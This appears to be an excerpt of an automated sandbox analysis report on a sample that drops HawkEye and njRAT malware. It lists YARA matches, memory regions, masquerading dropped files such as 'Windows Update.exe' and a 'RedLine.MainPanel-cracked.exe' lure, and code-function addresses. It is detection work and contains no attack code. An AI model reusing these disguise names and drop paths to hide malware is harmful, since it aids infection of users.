                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.2.Windows Update.exe.d49c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.2.Windows Update.exe.d49c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 2.2.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 2.2.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d40000.8.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d40000.8.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.2.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.2.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2886cd8.4.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2886cd8.4.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.2.Windows Update.exe.d9fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.2.Windows Update.exe.d9fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 16.2.RedLine.exe.2700000.1.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 16.2.RedLine.exe.2700000.1.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 16.2.RedLine.exe.2700000.1.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 2.0.Keylogger.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 2.0.Keylogger.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ae6cd8.3.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ae6cd8.3.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 16.2.RedLine.exe.2aa6a40.4.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 16.2.RedLine.exe.2aa6a40.4.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d49c0d.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d49c0d.15.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d9fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d9fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 16.2.RedLine.exe.2700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 16.2.RedLine.exe.2700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 16.2.RedLine.exe.2700000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d9fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d9fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d49c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d49c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d49c0d.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d49c0d.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d40000.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d40000.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 2.0.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 2.0.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d40000.12.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d40000.12.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 2.2.Keylogger.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 2.2.Keylogger.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.2.Windows Update.exe.33faa98.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.2.Windows Update.exe.33faa98.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000002A.00000002.490818765.0000000002EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 0000002A.00000002.490818765.0000000002EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000028.00000002.461183087.0000000000B02000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000028.00000002.461183087.0000000000B02000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000022.00000002.460848822.0000000002831000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 00000022.00000002.460848822.0000000002831000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000021.00000002.442088450.0000000000BC2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000021.00000002.442088450.0000000000BC2000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000010.00000002.569953826.0000000002A81000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 00000010.00000002.569953826.0000000002A81000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000028.00000000.452870911.0000000000B02000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000028.00000000.452870911.0000000000B02000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000004.00000002.344202284.0000000002AC1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 00000004.00000002.344202284.0000000002AC1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000011.00000002.401022146.0000000003844000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000002A.00000002.490487625.0000000002AD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 0000002A.00000002.490487625.0000000002AD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 0000002A.00000002.490487625.0000000002AD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000022.00000002.460388443.00000000008F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 00000022.00000002.460388443.00000000008F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 00000022.00000002.460388443.00000000008F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000023.00000002.517639660.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000023.00000002.517639660.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000011.00000002.398362779.00000000033D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000011.00000002.398362779.00000000033D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000023.00000000.438271647.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000023.00000000.438271647.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000011.00000000.345013885.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000011.00000000.345013885.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000023.00000000.439141750.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000023.00000000.439141750.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000011.00000002.395985311.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000011.00000002.395985311.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000005.00000002.339955429.0000000002861000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 00000005.00000002.339955429.0000000002861000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000011.00000000.344577031.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000011.00000000.344577031.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000021.00000000.418565410.0000000000BC2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000021.00000000.418565410.0000000000BC2000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000011.00000003.370310625.0000000006DFE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000011.00000003.370310625.0000000006DFE000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000023.00000000.439708948.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000023.00000000.439708948.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000023.00000000.437787976.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000023.00000000.437787976.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000021.00000002.445241123.00000000013F3000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000021.00000002.445241123.00000000013F3000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000005.00000002.339619983.00000000024B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 00000005.00000002.339619983.00000000024B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 00000005.00000002.339619983.00000000024B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000002.00000000.314643771.0000000000762000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000002.00000000.314643771.0000000000762000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000002.00000003.339296284.0000000000E97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000002.00000003.339296284.0000000000E97000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000001E.00000002.421069475.0000000002C51000.00000004.00000001.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 0000001E.00000002.421069475.0000000002C51000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000001E.00000002.420830260.0000000002620000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 0000001E.00000002.420830260.0000000002620000.00000004.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 0000001E.00000002.420830260.0000000002620000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000023.00000002.521512355.00000000036C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000023.00000002.521512355.00000000036C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000010.00000002.569803952.0000000002700000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 00000010.00000002.569803952.0000000002700000.00000004.00020000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 00000010.00000002.569803952.0000000002700000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000011.00000000.343560898.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000011.00000000.343560898.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Creates files with lurking names (e.g. Crack.exe)Show sources
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeFile created: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\RedLine.MainPanel-cracked.exe.logJump to behavior
                  .NET source code contains very large stringsShow sources
                  Source: RedLine.MainPanel-cracked.exe.0.dr, Class1.csLong String: Length: 25236
                  Source: RedLine.exe.4.dr, Class1.csLong String: Length: 25236
                  Source: 4.0.RedLine.MainPanel-cracked.exe.550000.0.unpack, Class1.csLong String: Length: 25236
                  Source: 4.2.RedLine.MainPanel-cracked.exe.550000.0.unpack, Class1.csLong String: Length: 25236
                  Source: 5.0.RedLine.MainPanel-cracked.exe.340000.0.unpack, Class1.csLong String: Length: 25236
                  Source: 5.2.RedLine.MainPanel-cracked.exe.340000.0.unpack, Class1.csLong String: Length: 25236
                  Source: 61bc7bd88d10e97264127fe545415b17.exe.16.dr, Class1.csLong String: Length: 25236
                  Source: 16.2.RedLine.exe.580000.0.unpack, Class1.csLong String: Length: 25236
                  Source: 16.0.RedLine.exe.580000.0.unpack, Class1.csLong String: Length: 25236
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2528
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_0076D426
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_0076D523
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_0077D5AE
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_00777646
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_007A29BE
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_007A6AF4
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_007CABFC
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_007C3C4D
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_007C3CBE
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_007C3D2F
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_0076ED03
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_007C3DC0
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_0077AFA6
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_0076CF92
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_02A71D98
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_0079C7BC
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_02A71DA8
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeCode function: 4_2_00007FFC08AB1AF5
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeCode function: 4_2_00007FFC08AB2363
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeCode function: 16_2_00007FFC08AE2403
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeCode function: 16_2_00007FFC08AE1B95
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeCode function: 16_2_00007FFC08AE5196
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00D4D426
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00D5D5AE
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00D4D523
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00D57646
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00D829BE
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00D86AF4
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00DAABFC
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00DA3CBE
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00DA3C4D
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00DA3DC0
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00D4ED03
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00DA3D2F
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00D4CF92
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00D5AFA6
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_02F77098
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_02F7A670
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_02F75758
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_02F76048
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_02F78A10
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_02F71D98
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_02F77088
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_00D7C7BC
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00404419
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00404516
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00413538
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_004145A1
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_0040E639
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_004337AF
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_004399B1
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_0043DAE7
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00405CF6
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00403F85
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00411F99
                  Source: Keylogger.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Keylogger.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Keylogger.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: RedLine.MainPanel-cracked.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: ViRuS.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Windows Update.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Windows Update.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Windows Update.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: RedLine.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: user32dll.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: 61bc7bd88d10e97264127fe545415b17.exe.16.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: WindowsUpdate.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
